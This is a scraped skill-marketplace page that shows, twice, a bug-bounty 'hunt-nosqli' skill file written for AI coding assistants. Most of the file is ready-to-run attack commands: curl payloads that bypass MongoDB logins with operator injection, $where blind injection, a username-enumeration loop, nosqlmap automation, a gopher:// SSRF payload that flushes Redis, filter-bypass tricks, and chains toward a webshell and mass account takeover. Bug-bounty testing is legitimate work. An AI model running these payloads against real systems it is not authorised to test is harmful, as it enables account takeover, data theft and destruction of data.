Exécutez n'importe quel Skill dans Manus
en un clic

Exécutez n'importe quel Skill dans Manus en un clic

hunt-nosqli

Étoiles2 620

Forks409

Mis à jour1 juin 2026 à 09:07

Hunt NoSQL Injection — MongoDB operator injection ($where, $regex, $gt, $ne), CouchDB, Redis command injection, auth bypass via NoSQLi, data dump. Use when target uses MongoDB/Mongoose, CouchDB, Redis, or shows NoSQL error messages.

Installation

Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.

Exécuter dans Manus

Source

elementalsouls

elementalsouls/Claude-BugHunter

Ouvrir le dépôt GitHub Voir les dépôts du créateur

Téléchargement

Exécuter dans Manus

Métiers associésSOC

Basé sur la classification professionnelle SOC

Analystes en sécurité de l'informationProfessions informatiques et mathématiques·SOC 15-1212

SKILL.md

readonly

name	hunt-nosqli
description	Hunt NoSQL Injection — MongoDB operator injection ($where, $regex, $gt, $ne), CouchDB, Redis command injection, auth bypass via NoSQLi, data dump. Use when target uses MongoDB/Mongoose, CouchDB, Redis, or shows NoSQL error messages.
sources	hackerone_public
report_count	14

HUNT-NOSQLI — NoSQL Injection

Crown Jewel Targets

NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).

Highest-value chains:

MongoDB auth bypass — {"username": {"$gt": ""}, "password": {"$gt": ""}} logs in as first user in collection (usually admin)
$where JS injection — if $where is enabled: blind injection → data exfil
Redis command injection — via SSRF or direct TCP, SLAVEOF attacker-ip → config write → webshell
Elasticsearch injection — _search endpoint with Groovy script injection (pre-5.0) → RCE

Attack Surface Signals

URL & Param Patterns

/api/users/login         POST with JSON body
/api/search?q=
/api/find?filter=
/api/query?where=
Any endpoint accepting JSON body with username/password

Stack Signals

Signal	Vector
MongoDB error messages in response	Operator injection
mongoose / monk in JS bundles	ODM patterns
X-Powered-By: Express	Node.js + MongoDB common stack
CouchDB/_utils UI exposed	Futon/Fauxton admin
Redis port 6379 open (via SSRF)	CONFIG SET / SLAVEOF
Elasticsearch :9200 open	Script injection

Step-by-Step Hunting Methodology

Phase 1 — Auth Bypass (MongoDB)

# Operator injection in JSON body
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Regex wildcard — match any username
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}'

# ne (not equal) bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$ne": "wrong"}}'

# in array bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$in": ["admin","administrator","root"]}, "password": {"$ne": "x"}}'

Phase 2 — URL Parameter Injection

# Array notation (Express/PHP-style)
curl "https://$TARGET/api/users?username[$gt]=&password[$gt]="
curl "https://$TARGET/api/search?q[$regex]=.*&q[$options]=i"

# POST form data
curl "https://$TARGET/api/login" \
  --data "username[$gt]=&password[$gt]="

Phase 3 — $where Blind Injection (time-based)

# Test if $where is enabled (time-based detection, 5s delay)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){var d=new Date();while(new Date()-d<5000){}; return true;}"}}'
# If response takes 5+ seconds → $where injection confirmed

# Blind data exfil (username starts with 'a'?)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){if(this.username.match(/^a/)){sleep(3000);} return true;}"}}'

Phase 4 — Data Dump via Regex

# Enumerate usernames character by character
for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do
  RESP=$(curl -s -X POST https://$TARGET/api/users \
    -H "Content-Type: application/json" \
    -d "{\"username\": {\"\$regex\": \"^$c\"}}")
  echo "$c: $(echo $RESP | wc -c)"
done

Phase 5 — Automation

# nosqlmap
pip3 install nosqlmap
nosqlmap -u "https://$TARGET/api/login" --attack 1

# nosqlmap data extraction
nosqlmap -u "https://$TARGET/api/login" --attack 2

Phase 6 — Redis via SSRF

# If SSRF found, probe internal Redis via gopher://
curl "https://$TARGET/fetch?url=gopher://127.0.0.1:6379/_*1%0d%0a%248%0d%0aflushall%0d%0a"

# CONFIG SET webshell (if Redis has write access to web root)
# Use SLAVEOF for OOB data exfil

Bypass Table

Defense	Bypass
JSON.parse rejects objects	Use array: `password[$ne]=x` (URL params)
Sanitizes `$`	Unicode: `$gt`
Blocks operator keys	Nested objects deeper in structure

Chain Table

NoSQLi finding	Chain to	Impact
Auth bypass	Admin panel access	Full admin control
User enum via regex	Credential stuffing	Mass ATO
$where enabled	Arbitrary JS in DB process	Data exfil or DoS
Redis via SSRF	CONFIG SET / SLAVEOF	Webshell or data exfil

Validation

✅ Auth bypass: logged in without valid credentials, received valid session token ✅ Data dump: returned users/documents you shouldn't have access to ✅ Blind injection: confirmed via time-delay (>4 seconds consistent)

Severity:

Auth bypass as admin: Critical
User collection dump: High
Blind injection (no useful exfil): Medium

Plus depuis ce dépôt

même dépôt

bugcrowd-reporting

elementalsouls/Claude-BugHunter

Bugcrowd-specific reporting tactics complementing report-writing: VRT category search-and-fallback strategy when no exact match exists, manual severity override when VRT defaults underrate impact, severity-request paragraph as first body section, OOS-clause rebuttal templates (rate limiting on auth-flow endpoints, debug-info framing, user-enumeration with sensitive PII, theoretical-issue counter), chained-finding cross-reference patterns, target selection for QA-vs-prod programs, researcher-side hygiene (Bugcrowdninja email alias, account state restoration, friendly-tester posture). Use when filing a Bugcrowd submission, when VRT default seems wrong, when triager closes as OOS or downgrades severity, when chaining linked submissions, or when scope distinguishes production from QA. Pairs with report-writing and triage-validation.

2026-06-072.6k

enterprise-vpn-attack

elementalsouls/Claude-BugHunter

External SSL VPN / remote-access appliance attack matrix — Cisco ASA/AnyConnect, Fortinet FortiGate/FortiOS, Citrix NetScaler/ADC, Palo Alto GlobalProtect, Pulse Secure / Ivanti Connect Secure, SonicWall, F5 Big-IP. Covers version fingerprinting, CVE matrix (2018-2026), AAA backend identification, default credentials, configuration-disclosure paths, pre-auth RCE/SSRF/path-traversal exploits where applicable. Built from authorized-engagement Cisco ASA testing plus 2024-2026 enterprise VPN CVE landscape. Use whenever the target's perimeter exposes any SSL VPN appliance or remote-access gateway — these are the most common initial-access points in 2024-2026 actor TTPs.

2026-06-072.6k

hunt-business-logic

elementalsouls/Claude-BugHunter

Hunting skill for business logic vulnerabilities. Built from 12 public bug bounty reports. Covers coupon-race-stacking (Instacart, Stripe, Reverb), negative-quantity-in-cart price tampering (Upserve, Eternal/Zomato), decimal/fraction price-field overflow (Shipt), client-side checkout amount trust on PayPal redirect (WordPress.org), price-per-unit mass-assignment (Krisp), and archived-price swap / cart-TOCTOU (Stripe). Use when hunting business logic — heavy emphasis on financial-impact-demonstrated cases.

2026-06-072.6k

hunt-cache-poison

elementalsouls/Claude-BugHunter

Hunting skill for cache poison vulnerabilities. Built from 10 public bug bounty reports including X-Forwarded-Host poisoning, X-HTTP-Method-Override / GCS cache, reflected→stored XSS via cache, classic Omer-Gil Web Cache Deception, Cloudflare Cache Deception Armor bypass, session-token cache deception, Akamai hop-by-hop smuggling → server-side edge poisoning, and Kettle's 2024 path-normalization WCD against Cloudflare/Fastly/GCP. Use when hunting cache poisoning, Web Cache Deception, CDN-fronted apps.

2026-06-072.6k

hunt-mfa-bypass

elementalsouls/Claude-BugHunter

Hunt MFA / 2FA bypass — 7 distinct patterns. (1) MFA not enforced on sensitive endpoints (password change, email change accept without MFA challenge), (2) MFA-step skip via direct navigation to post-login URL, (3) MFA-token replay (same code accepted twice), (4) brute-force the 6-digit OTP without rate limit (10^6 attempts at server speed), (5) race condition on OTP validation, (6) recovery-code dump via /api/me, (7) backup factor downgrade (SMS factor with no rate limit). Plus the chain: cookie theft + password oracle + no step-up = ATO without MFA challenge. Detection: trace auth flow in Burp, find every state transition, check if MFA is middleware-gated vs per-endpoint, check OTP entropy and rate limit on OTP-validate. Validate: attacker session reaching post-MFA state. Use when hunting auth bypass, MFA flows, chaining primitives toward ATO.

2026-06-072.6k

hunt-nextjs

elementalsouls/Claude-BugHunter

Hunt Next.js specific vulnerabilities — Server Actions arbitrary function execution, Middleware auth bypass via static asset paths, ISR cache poisoning, Image Optimization SSRF (/_next/image), RSC payload leakage, getServerSideProps injection, source map exposure, debug endpoint leakage. Use when target runs Next.js 13/14/15 or any React SSR framework.

2026-06-072.6k

name	hunt-nosqli
description	Hunt NoSQL Injection — MongoDB operator injection ($where, $regex, $gt, $ne), CouchDB, Redis command injection, auth bypass via NoSQLi, data dump. Use when target uses MongoDB/Mongoose, CouchDB, Redis, or shows NoSQL error messages.
sources	hackerone_public
report_count	14

HUNT-NOSQLI — NoSQL Injection

Crown Jewel Targets

NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).

Highest-value chains:

MongoDB auth bypass — {"username": {"$gt": ""}, "password": {"$gt": ""}} logs in as first user in collection (usually admin)
$where JS injection — if $where is enabled: blind injection → data exfil
Redis command injection — via SSRF or direct TCP, SLAVEOF attacker-ip → config write → webshell
Elasticsearch injection — _search endpoint with Groovy script injection (pre-5.0) → RCE

Attack Surface Signals

URL & Param Patterns

/api/users/login         POST with JSON body
/api/search?q=
/api/find?filter=
/api/query?where=
Any endpoint accepting JSON body with username/password

Stack Signals

Signal	Vector
MongoDB error messages in response	Operator injection
mongoose / monk in JS bundles	ODM patterns
X-Powered-By: Express	Node.js + MongoDB common stack
CouchDB/_utils UI exposed	Futon/Fauxton admin
Redis port 6379 open (via SSRF)	CONFIG SET / SLAVEOF
Elasticsearch :9200 open	Script injection

Step-by-Step Hunting Methodology

Phase 1 — Auth Bypass (MongoDB)

# Operator injection in JSON body
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Regex wildcard — match any username
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}'

# ne (not equal) bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$ne": "wrong"}}'

# in array bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$in": ["admin","administrator","root"]}, "password": {"$ne": "x"}}'

Phase 2 — URL Parameter Injection

# Array notation (Express/PHP-style)
curl "https://$TARGET/api/users?username[$gt]=&password[$gt]="
curl "https://$TARGET/api/search?q[$regex]=.*&q[$options]=i"

# POST form data
curl "https://$TARGET/api/login" \
  --data "username[$gt]=&password[$gt]="

Phase 3 — $where Blind Injection (time-based)

# Test if $where is enabled (time-based detection, 5s delay)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){var d=new Date();while(new Date()-d<5000){}; return true;}"}}'
# If response takes 5+ seconds → $where injection confirmed

# Blind data exfil (username starts with 'a'?)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){if(this.username.match(/^a/)){sleep(3000);} return true;}"}}'

Phase 4 — Data Dump via Regex

# Enumerate usernames character by character
for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do
  RESP=$(curl -s -X POST https://$TARGET/api/users \
    -H "Content-Type: application/json" \
    -d "{\"username\": {\"\$regex\": \"^$c\"}}")
  echo "$c: $(echo $RESP | wc -c)"
done

Phase 5 — Automation

# nosqlmap
pip3 install nosqlmap
nosqlmap -u "https://$TARGET/api/login" --attack 1

# nosqlmap data extraction
nosqlmap -u "https://$TARGET/api/login" --attack 2

Phase 6 — Redis via SSRF

# If SSRF found, probe internal Redis via gopher://
curl "https://$TARGET/fetch?url=gopher://127.0.0.1:6379/_*1%0d%0a%248%0d%0aflushall%0d%0a"

# CONFIG SET webshell (if Redis has write access to web root)
# Use SLAVEOF for OOB data exfil

Bypass Table

Defense	Bypass
JSON.parse rejects objects	Use array: `password[$ne]=x` (URL params)
Sanitizes `$`	Unicode: `$gt`
Blocks operator keys	Nested objects deeper in structure

Chain Table

NoSQLi finding	Chain to	Impact
Auth bypass	Admin panel access	Full admin control
User enum via regex	Credential stuffing	Mass ATO
$where enabled	Arbitrary JS in DB process	Data exfil or DoS
Redis via SSRF	CONFIG SET / SLAVEOF	Webshell or data exfil

Validation

Severity:

Auth bypass as admin: Critical
User collection dump: High
Blind injection (no useful exfil): Medium